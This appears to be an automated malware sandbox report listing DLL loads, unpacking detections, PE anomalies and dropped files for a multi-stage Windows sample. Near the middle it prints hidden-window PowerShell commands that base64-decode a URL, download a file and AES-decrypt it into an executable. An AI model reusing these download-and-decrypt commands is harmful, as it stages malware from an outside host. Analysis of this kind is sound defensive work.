Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 3248128 > 1048576

Source: file.exe

Static PE information: Raw size of fhtimfgd is bigger than: 0x100000 < 0x2ad400

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c92938c010.exe, 00000010.00000002.2970633275.0000000006AE2000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.950000.0.unpack :EW;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.950000.0.unpack :EW;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.950000.0.unpack :EW;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fhtimfgd:EW;btpwxgez:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Unpacked PE file: 16.2.c92938c010.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;izjfeliq:EW;vizxjewx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;izjfeliq:EW;vizxjewx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Unpacked PE file: 17.2.2bd330404c.exe.110000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pjdaqopi:EW;opjfflev:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pjdaqopi:EW;opjfflev:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Unpacked PE file: 19.2.c92938c010.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;izjfeliq:EW;vizxjewx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;izjfeliq:EW;vizxjewx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Unpacked PE file: 38.2.2bd330404c.exe.110000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pjdaqopi:EW;opjfflev:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pjdaqopi:EW;opjfflev:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Unpacked PE file: 50.2.c92938c010.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;izjfeliq:EW;vizxjewx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;izjfeliq:EW;vizxjewx:EW;.taggant:EW;

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'@{# Script module or binary module file associated wi

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe

Code function: 7_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

7_2_000000014000D9C4

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 4ZAAIhb[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x294d5
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x2a3ec4 should be: 0x299bb5
Source: 4ZAAIhb.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x294d5
Source: nss3[1].dll.17.dr	Static PE information: real checksum: 0x202d6c should be: 0xebb97
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0x1ba948 should be: 0x1b75c1
Source: 6dce78ba2b.exe.6.dr	Static PE information: real checksum: 0x2a3ec4 should be: 0x299bb5
Source: 2bd330404c.exe.6.dr	Static PE information: real checksum: 0x1ba948 should be: 0x1b75c1
Source: c92938c010.exe.6.dr	Static PE information: real checksum: 0x1c5940 should be: 0x1c7df4
Source: file.exe	Static PE information: real checksum: 0x324b4d should be: 0x3250fd
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x324b4d should be: 0x3250fd
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x1c5940 should be: 0x1c7df4
Source: downloaded_file.exe.37.dr	Static PE information: real checksum: 0x0 should be: 0x85ce3
Source: nss3.dll.17.dr	Static PE information: real checksum: 0x202d6c should be: 0xebb97

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: fhtimfgd
Source: file.exe	Static PE information: section name: btpwxgez
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: fhtimfgd
Source: skotes.exe.0.dr	Static PE information: section name: btpwxgez
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name: quaaapuk
Source: random[1].exe.6.dr	Static PE information: section name: agtviptv
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name:
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name: .idata
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name: quaaapuk
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name: agtviptv
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name: .taggant
Source: 4ZAAIhb[1].exe.6.dr	Static PE information: section name: .code
Source: 4ZAAIhb.exe.6.dr	Static PE information: section name: .code
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: izjfeliq
Source: random[1].exe0.6.dr	Static PE information: section name: vizxjewx
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: c92938c010.exe.6.dr	Static PE information: section name:
Source: c92938c010.exe.6.dr	Static PE information: section name: .idata
Source: c92938c010.exe.6.dr	Static PE information: section name:
Source: c92938c010.exe.6.dr	Static PE information: section name: izjfeliq
Source: c92938c010.exe.6.dr	Static PE information: section name: vizxjewx
Source: c92938c010.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: pjdaqopi
Source: random[1].exe1.6.dr	Static PE information: section name: opjfflev
Source: random[1].exe1.6.dr	Static PE information: section name: .taggant
Source: 2bd330404c.exe.6.dr	Static PE information: section name:
Source: 2bd330404c.exe.6.dr	Static PE information: section name: .idata
Source: 2bd330404c.exe.6.dr	Static PE information: section name:
Source: 2bd330404c.exe.6.dr	Static PE information: section name: pjdaqopi
Source: 2bd330404c.exe.6.dr	Static PE information: section name: opjfflev
Source: 2bd330404c.exe.6.dr	Static PE information: section name: .taggant
Source: freebl3.dll.17.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.17.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.17.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.17.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.17.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.17.dr	Static PE information: section name: .didat
Source: nss3.dll.17.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.17.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFD91C push ecx; ret	0_2_00FFD92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF1359 push es; ret	0_2_00FF135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0096D91C push ecx; ret	1_2_0096D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0096D91C push ecx; ret	2_2_0096D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0096D91C push ecx; ret	6_2_0096D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0098DEDB push ss; iretd	6_2_0098DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0096DFC6 push ecx; ret	6_2_0096DFD9
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_000000014001BD2E push rbx; ret	7_2_000000014001BD2F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AEBEAA push cs; retf	16_2_06AEBF23
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AEE6AA push 569D7677h; mov dword ptr [esp], ecx	16_2_06AEE6BD
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF06A4 push 492E30DCh; mov dword ptr [esp], ebp	16_2_06AF06B7
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF3EA1 push ecx; mov dword ptr [esp], esp	16_2_06AF4F80
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF3EA1 push 2CD64BA8h; mov dword ptr [esp], ecx	16_2_06AF4FA8
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF0EBC push edi; mov dword ptr [esp], ebx	16_2_06AF2ADB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF1E8F push edx; mov dword ptr [esp], ecx	16_2_06AF1E99
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF0694 push edi; mov dword ptr [esp], eax	16_2_06AF264B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AECEEE push ecx; mov dword ptr [esp], eax	16_2_06AECFDB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AECEEE push edx; mov dword ptr [esp], ecx	16_2_06AECFDF
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AEE6E3 push ebp; mov dword ptr [esp], 000001F4h	16_2_06AEF744
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AEE6E3 push 2E5E5A6Bh; mov dword ptr [esp], edi	16_2_06AEF754
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF1EFF push esi; mov dword ptr [esp], 75AFB330h	16_2_06AF4E3D
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AECECC push 0F24EFFBh; mov dword ptr [esp], edx	16_2_06AED443
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF06C7 push ebx; mov dword ptr [esp], ecx	16_2_06AF06CE
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF06C7 push eax; mov dword ptr [esp], 061A88C4h	16_2_06AF3093
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF2EC4 push edi; mov dword ptr [esp], esi	16_2_06AF2ECB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AECEDF push ebx; mov dword ptr [esp], esi	16_2_06AECEE6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AECEDF push ebx; mov dword ptr [esp], edi	16_2_06AED15D
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF0ED6 push 4A8B9802h; mov dword ptr [esp], edx	16_2_06AF0F01
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF0ED6 push 3B1DE9C9h; mov dword ptr [esp], eax	16_2_06AF48EC
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF2E29 push 283648FFh; mov dword ptr [esp], eax	16_2_06AF2E56
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF161F push 1B148D80h; mov dword ptr [esp], ebx	16_2_06AF3BD9

Source: file.exe	Static PE information: section name: entropy: 7.079314060716548
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.079314060716548
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.79895615266627
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name: entropy: 7.79895615266627
Source: random[1].exe0.6.dr	Static PE information: section name: entropy: 7.967785006483123
Source: random[1].exe0.6.dr	Static PE information: section name: izjfeliq entropy: 7.954186406218198
Source: c92938c010.exe.6.dr	Static PE information: section name: entropy: 7.967785006483123
Source: c92938c010.exe.6.dr	Static PE information: section name: izjfeliq entropy: 7.954186406218198
Source: random[1].exe1.6.dr	Static PE information: section name: pjdaqopi entropy: 7.954083305590059
Source: 2bd330404c.exe.6.dr	Static PE information: section name: pjdaqopi entropy: 7.954083305590059

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
